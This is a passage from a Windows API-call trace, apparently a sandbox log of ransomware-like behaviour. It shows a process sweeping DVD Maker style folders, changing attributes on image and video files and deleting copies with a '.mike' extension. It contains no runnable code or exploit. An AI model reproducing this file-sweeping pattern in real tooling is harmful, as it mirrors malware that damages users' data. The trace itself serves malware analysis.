(normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_selectionsubpicture.png.mike")) returned 1 [0058.994] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0058.998] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0058.998] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_buttongraphic.png.mike")) returned 1 [0058.999] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.003] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.004] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_selectionsubpicture.png.mike")) returned 1 [0059.007] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.012] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png", dwFileAttributes=0x80) returned 0 [0059.013] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\reflect.png.mike")) returned 1 [0059.014] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.033] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png", dwFileAttributes=0x80) returned 0 [0059.033] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\vistabg.png.mike")) returned 1 [0059.035] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0059.035] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.035] CoTaskMemFree (pv=0x4e1c10) [0059.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.042] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.046] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0059.046] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\1047x576black.png.mike")) returned 1 [0059.048] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.051] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0059.052] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\203x8subpicture.png.mike")) returned 1 [0059.054] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.063] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png", dwFileAttributes=0x80) returned 0 [0059.063] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\bandwidth.png.mike")) returned 1 [0059.065] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.069] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png", dwFileAttributes=0x80) returned 0 [0059.069] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png.mike")) returned 1 [0059.070] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.074] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.074] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_buttongraphic.png.mike")) returned 1 [0059.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.079] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.079] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0059.083] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.087] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.087] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_buttongraphic.png.mike")) returned 1 [0059.088] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.092] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.092] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_selectionsubpicture.png.mike")) returned 1 [0059.093] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.097] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.097] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_buttongraphic.png.mike")) returned 1 [0059.099] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.102] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.103] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_selectionsubpicture.png.mike")) returned 1 [0059.104] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.164] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv", dwFileAttributes=0x80) returned 0 [0059.164] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask.wmv.mike")) returned 1 [0059.168] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.230] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv", dwFileAttributes=0x80) returned 0 [0059.230] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask_pal.wmv.mike")) returned 1 [0059.234] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0059.234] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.234] CoTaskMemFree (pv=0x4e1c10) [0059.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.241] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.245] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0059.245] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\1047x576black.png.mike")) returned 1 [0059.246] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.250] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0059.250] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\203x8subpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\203x8subpicture.png.mike")) returned 1 [0059.251] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.255] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.256] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_buttongraphic.png.mike")) returned 1 [0059.257] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.261] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.261] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0059.262] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.268] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.269] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_buttongraphic.png.mike")) returned 1 [0059.270] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.273] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.274] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_selectionsubpicture.png.mike")) returned 1 [0059.275] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.279] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.279] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_buttongraphic.png.mike")) returned 1 [0059.280] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.283] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.284] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_selectionsubpicture.png.mike")) returned 1 [0059.285] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.291] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png", dwFileAttributes=0x80) returned 0 [0059.291] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\shatter.png.mike")) returned 1 [0059.292] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0059.292] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.292] CoTaskMemFree (pv=0x4e1c10) [0059.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.299] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.303] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0059.304] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\1047x576black.png.mike")) returned 1 [0059.305] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.312] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png", dwFileAttributes=0x80) returned 0 [0059.312] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\mainscroll.png.mike")) returned 1 [0059.313] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.317] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.317] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_buttongraphic.png.mike")) returned 1 [0059.319] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.325] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.325] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0059.326] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.330] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.330] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_buttongraphic.png.mike")) returned 1 [0059.332] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.335] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.336] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_selectionsubpicture.png.mike")) returned 1 [0059.337] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.341] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.341] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_buttongraphic.png.mike")) returned 1 [0059.342] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.346] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.346] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_selectionsubpicture.png.mike")) returned 1 [0059.347] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.358] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png", dwFileAttributes=0x80) returned 0 [0059.358] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\scenesscroll.png.mike")) returned 1 [0059.359] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.363] SetFileAttributesW 